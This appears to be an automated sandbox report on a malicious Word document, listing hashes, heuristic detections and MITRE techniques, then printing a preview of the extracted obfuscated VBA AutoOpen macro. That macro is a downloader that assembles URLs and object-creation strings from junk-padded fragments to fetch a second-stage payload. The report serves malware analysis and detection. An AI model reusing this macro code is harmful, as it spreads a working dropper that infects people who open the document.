Office (OLE) malware analysis — malicious · bb1fcaf0b421a08a

MALICIOUS

Office (OLE)

215.5 KB Created: 2017-12-21 19:38:00 Authoring application: Microsoft Office Word First seen: 2017-12-24

MD5: accf5968966fa14c00aedff6791e9c14 SHA-1: 688db56dda3e2fad6b1123b472b006f6c0deccc3 SHA-256: bb1fcaf0b421a08a89115dfd22fe6b33568f35c35025411adbb7ca5d3999de2e

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a legacy WordBasic AutoOpen macro, which is a known indicator of malicious documents. The macro utilizes the Shell() function, a critical heuristic firing, to execute arbitrary commands. This strongly suggests the document is designed to download and execute a second-stage payload, typical of macro-based malware droppers.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 81330 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	81330 bytes
SHA-256: `4b7a2db9a7c52f57b02a99ddaabcefb45fad4c2e509a6500223376be95246e74`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "zhqMKzRiBq" Sub AutoOpen() On Error Resume Next iHFmQqiOY = 871 / Rnd(4) + lfVMMbWdIhWEz + bcKPucPKfYwKV * 9 + Int(krXkMfiwlCAKu * CStr(qdQiKNKnfSU)) + abAzPBGdtRJlrR * CDate(3624 - 352183467 * 84 / 475) / irIPjhnT - CSng(620) CISzIhwMF = 871 / Rnd(4) + QEGwnmwEQ + ZTimtEfwXDkO * 9 + Int(IzpzCwvwFEVaM * CStr(iDVQfRD)) + idfGDBAoBfCQww * CDate(3624 - 352183467 * 84 / 475) / pwGVmUOJLjCzsB - CSng(620) mFzkOPMRv = 871 / Rnd(4) + twQDpYvDkGfTYv + ZUUUaAEHn * 9 + Int(aFjkjlYAL * CStr(qELTnkzMmVS)) + BTovrzVtood * CDate(3624 - 352183467 * 84 / 475) / OSPSBUHTNUaVI - CSng(620) AjpBrVRwu = 871 / Rnd(4) + MwntafS + BaXEVVjLROzT * 9 + Int(tSmrQjszTMsU * CStr(CWNbhovhY)) + lvLUUjDDwbXSdB * CDate(3624 - 352183467 * 84 / 475) / KwZpiOf - CSng(620) kHSKzqjLY = 871 / Rnd(4) + VXBvFLXQPJvtqj + MYWpVsqfFLDBJ * 9 + Int(NWlDYzFzGEmB * CStr(SFjqRiSlRK)) + CGisvjBKOi * CDate(3624 - 352183467 * 84 / 475) / mKqRmmM - CSng(620) Application.Run "bMlcDLi", pGJOHTiVjj SSCTTYaVU = 871 / Rnd(4) + TrwvMPARSNDW + cnqQSZA * 9 + Int(wfYzrTjnGRaOPq * CStr(lGavpATYJv)) + ZfcIHwUmX * CDate(3624 - 352183467 * 84 / 475) / XwUvQdMv - CSng(620) dHnlQFJrd = 871 / Rnd(4) + zcGPEcuD + wKducTLN * 9 + Int(GAZWHdfn * CStr(nPWwPSKnuEI)) + rBNSNlANLSEsw * CDate(3624 - 352183467 * 84 / 475) / dlcUdkRBGnoz - CSng(620) vKkoYGFTP = 871 / Rnd(4) + LDtrfZPVKizipY + abYapuZi * 9 + Int(ppdXtwnfV * CStr(ZYalErmldJz)) + VLcwfhsaE * CDate(3624 - 352183467 * 84 / 475) / ZfCqwsbMrTJL - CSng(620) wmzpTjCJw = 871 / Rnd(4) + OYURuvSGnu + owvjOuuJQS * 9 + Int(HKMpwqNJXvo * CStr(RdVfzjt)) + jOlKoEFFoIAj * CDate(3624 - 352183467 * 84 / 475) / iRKEEwc - CSng(620) sdWiztdGs = 871 / Rnd(4) + wcWhzsYCB + kIVOvIDjLLatkR * 9 + Int(DsGKuazMZMXJT * CStr(YlBCBrkIIjrq)) + uhoCrEpwASrHTl * CDate(3624 - 352183467 * 84 / 475) / wBXwjAnZYqjaIu - CSng(620) End Sub Function pGJOHTiVjj() On Error Resume Next LQLSUjFwoSj = 871 / Rnd(4) + SvWChXkHmPT + apFzKtr * 9 + Int(IXIQDhIKhtzl * CStr(spVlzWSIHoSCVr)) + EhwWXVUvn * CDate(3624 - 352183467 * 84 / 475) / wzPZZsP - CSng(620) tSbOis = 871 / Rnd(4) + flazjNOpc + ChoTOziAQ * 9 + Int(IdhkGVmjTFww * CStr(HMzidXwqma)) + MVOAQACVIQICDq * CDate(3624 - 352183467 * 84 / 475) / OaiVXSEKjGQOF - CSng(620) HKonQmVdqjS = Mid("iq+ogq-oogq+ogqbogq+ogqject ran'+'AdR+AdRdom;tFbogq+AdR+AdRogqbcd ogq'+'+ogq= Cgjogq+ogqhttp:ogqAdR+A'+'dR+ogq//www.ogq+AdR+AdRogq5tLPuonkki", 2, 129) iQcNrRf = 871 / Rnd(4) + EiAkNKXZbAip + iptGzwdOb * 9 + Int(uhjBWDjhvC * CStr(QJOUUlzwuU)) + zqQKVTavm * CDate(3624 - 352183467 * 84 / 475) / dLFChJAVs - CSng(620) ozdXsEG = 871 / Rnd(4) + pkzvEJnZqomFS + SMEBdORHRsAkFw * 9 + Int(zXQsptmVwiVAFK * CStr(nmVoZVHNd)) + YhTGvTErfqQV * CDate(3624 - 352183467 * 84 / 475) / cBjrHWHOM - CSng(620) vCdmACnau = 871 / Rnd(4) + mntSjfliL + QhChkplMhPH * 9 + Int(PCmzIRncwcCBaK * CStr(zdphvkICwIYSsY)) + ocLmXrfiXUrjf * CDate(3624 - 352183467 * 84 / 475) / fBGasnisiLPGz - CSng(620) zZImJOhFjSi = Mid("uPowwjDizJNOsk7twpacQZ3ZCDDogq_.ogq+ogqExceogq+ogqpogq+ogqtioogq+'+'ogqn.Me'+'sogq+ogqsog'+'AdR+AdRq+ogqaogq+NVuhXSkRl", 28, 82) DSnkAZQi = 871 / Rnd(4) + wENPRWYsJnHQMT + BLRIZUBSZ * 9 + Int(mtdzrWWMkUChD * CStr(UGzHiFMpMdFK)) + GmcwmnXidutRR * CDate(3624 - 352183467 * 84 / 475) / DbwMTIfnTXuj - CSng(620) YAtAwD = 871 / Rnd(4) + EVMaoauR + EfwjvnU * 9 + Int(ZnWLmzjT * CStr(wiJrHPYVOE)) + zowBpNAnBqoi * CDate(3624 - 352183467 * 84 / 475) / vEiavRYdG - CSng(620) GIuEkVfD = 871 / Rnd(4) + fzjAtjjPaI + PtfHrLEpQU * 9 + Int(NOQmCKST * CStr(CCTrjzu)) + llVcSawZcXwHSE * CDate(3624 - 352183467 * 84 / 475) / zWkSkHiVw - CSng(620) LNIvfVoIZ = Mid("rjbmY64'ooAdR+AdRgq+oAdR+AdRg'+'qmogq+ogq/Stogq+ogq6ogq+ogq5fdogq+o'+'gqfogq+ogqTogq+ogqG,httogq+ogqp:ogq+ogq//www.cenogq+ogAdR+AdRqtauAdR+'+'AdR'+'rogq+AdR+AdRzN8i6i179L54US7noj", 8, 153) cvpHb = 871 / Rnd ... (truncated)

SHA-256: 4b7a2db9a7c52f57b02a99ddaabcefb45fad4c2e509a6500223376be95246e74

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zhqMKzRiBq"
Sub AutoOpen()
On Error Resume Next
iHFmQqiOY = 871 / Rnd(4) + lfVMMbWdIhWEz + bcKPucPKfYwKV * 9 + Int(krXkMfiwlCAKu * CStr(qdQiKNKnfSU)) + abAzPBGdtRJlrR * CDate(3624 - 352183467 * 84 / 475) / irIPjhnT - CSng(620)
CISzIhwMF = 871 / Rnd(4) + QEGwnmwEQ + ZTimtEfwXDkO * 9 + Int(IzpzCwvwFEVaM * CStr(iDVQfRD)) + idfGDBAoBfCQww * CDate(3624 - 352183467 * 84 / 475) / pwGVmUOJLjCzsB - CSng(620)
mFzkOPMRv = 871 / Rnd(4) + twQDpYvDkGfTYv + ZUUUaAEHn * 9 + Int(aFjkjlYAL * CStr(qELTnkzMmVS)) + BTovrzVtood * CDate(3624 - 352183467 * 84 / 475) / OSPSBUHTNUaVI - CSng(620)
AjpBrVRwu = 871 / Rnd(4) + MwntafS + BaXEVVjLROzT * 9 + Int(tSmrQjszTMsU * CStr(CWNbhovhY)) + lvLUUjDDwbXSdB * CDate(3624 - 352183467 * 84 / 475) / KwZpiOf - CSng(620)
kHSKzqjLY = 871 / Rnd(4) + VXBvFLXQPJvtqj + MYWpVsqfFLDBJ * 9 + Int(NWlDYzFzGEmB * CStr(SFjqRiSlRK)) + CGisvjBKOi * CDate(3624 - 352183467 * 84 / 475) / mKqRmmM - CSng(620)
Application.Run "bMlcDLi", pGJOHTiVjj
SSCTTYaVU = 871 / Rnd(4) + TrwvMPARSNDW + cnqQSZA * 9 + Int(wfYzrTjnGRaOPq * CStr(lGavpATYJv)) + ZfcIHwUmX * CDate(3624 - 352183467 * 84 / 475) / XwUvQdMv - CSng(620)
dHnlQFJrd = 871 / Rnd(4) + zcGPEcuD + wKducTLN * 9 + Int(GAZWHdfn * CStr(nPWwPSKnuEI)) + rBNSNlANLSEsw * CDate(3624 - 352183467 * 84 / 475) / dlcUdkRBGnoz - CSng(620)
vKkoYGFTP = 871 / Rnd(4) + LDtrfZPVKizipY + abYapuZi * 9 + Int(ppdXtwnfV * CStr(ZYalErmldJz)) + VLcwfhsaE * CDate(3624 - 352183467 * 84 / 475) / ZfCqwsbMrTJL - CSng(620)
wmzpTjCJw = 871 / Rnd(4) + OYURuvSGnu + owvjOuuJQS * 9 + Int(HKMpwqNJXvo * CStr(RdVfzjt)) + jOlKoEFFoIAj * CDate(3624 - 352183467 * 84 / 475) / iRKEEwc - CSng(620)
sdWiztdGs = 871 / Rnd(4) + wcWhzsYCB + kIVOvIDjLLatkR * 9 + Int(DsGKuazMZMXJT * CStr(YlBCBrkIIjrq)) + uhoCrEpwASrHTl * CDate(3624 - 352183467 * 84 / 475) / wBXwjAnZYqjaIu - CSng(620)
End Sub
Function pGJOHTiVjj()
On Error Resume Next
LQLSUjFwoSj = 871 / Rnd(4) + SvWChXkHmPT + apFzKtr * 9 + Int(IXIQDhIKhtzl * CStr(spVlzWSIHoSCVr)) + EhwWXVUvn * CDate(3624 - 352183467 * 84 / 475) / wzPZZsP - CSng(620)
tSbOis = 871 / Rnd(4) + flazjNOpc + ChoTOziAQ * 9 + Int(IdhkGVmjTFww * CStr(HMzidXwqma)) + MVOAQACVIQICDq * CDate(3624 - 352183467 * 84 / 475) / OaiVXSEKjGQOF - CSng(620)
HKonQmVdqjS = Mid("iq+ogq-oogq+ogqbogq+ogqject ran'+'AdR+AdRdom;tFbogq+AdR+AdRogqbcd ogq'+'+ogq= Cgjogq+ogqhttp:ogqAdR+A'+'dR+ogq//www.ogq+AdR+AdRogq5tLPuonkki", 2, 129)
iQcNrRf = 871 / Rnd(4) + EiAkNKXZbAip + iptGzwdOb * 9 + Int(uhjBWDjhvC * CStr(QJOUUlzwuU)) + zqQKVTavm * CDate(3624 - 352183467 * 84 / 475) / dLFChJAVs - CSng(620)
ozdXsEG = 871 / Rnd(4) + pkzvEJnZqomFS + SMEBdORHRsAkFw * 9 + Int(zXQsptmVwiVAFK * CStr(nmVoZVHNd)) + YhTGvTErfqQV * CDate(3624 - 352183467 * 84 / 475) / cBjrHWHOM - CSng(620)
vCdmACnau = 871 / Rnd(4) + mntSjfliL + QhChkplMhPH * 9 + Int(PCmzIRncwcCBaK * CStr(zdphvkICwIYSsY)) + ocLmXrfiXUrjf * CDate(3624 - 352183467 * 84 / 475) / fBGasnisiLPGz - CSng(620)
zZImJOhFjSi = Mid("uPowwjDizJNOsk7twpacQZ3ZCDDogq_.ogq+ogqExceogq+ogqpogq+ogqtioogq+'+'ogqn.Me'+'sogq+ogqsog'+'AdR+AdRq+ogqaogq+NVuhXSkRl", 28, 82)
DSnkAZQi = 871 / Rnd(4) + wENPRWYsJnHQMT + BLRIZUBSZ * 9 + Int(mtdzrWWMkUChD * CStr(UGzHiFMpMdFK)) + GmcwmnXidutRR * CDate(3624 - 352183467 * 84 / 475) / DbwMTIfnTXuj - CSng(620)
YAtAwD = 871 / Rnd(4) + EVMaoauR + EfwjvnU * 9 + Int(ZnWLmzjT * CStr(wiJrHPYVOE)) + zowBpNAnBqoi * CDate(3624 - 352183467 * 84 / 475) / vEiavRYdG - CSng(620)
GIuEkVfD = 871 / Rnd(4) + fzjAtjjPaI + PtfHrLEpQU * 9 + Int(NOQmCKST * CStr(CCTrjzu)) + llVcSawZcXwHSE * CDate(3624 - 352183467 * 84 / 475) / zWkSkHiVw - CSng(620)
LNIvfVoIZ = Mid("rjbmY64'ooAdR+AdRgq+oAdR+AdRg'+'qmogq+ogq/Stogq+ogq6ogq+ogq5fdogq+o'+'gqfogq+ogqTogq+ogqG,httogq+ogqp:ogq+ogq//www.cenogq+ogAdR+AdRqtauAdR+'+'AdR'+'rogq+AdR+AdRzN8i6i179L54US7noj", 8, 153)
cvpHb = 871 / Rnd
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.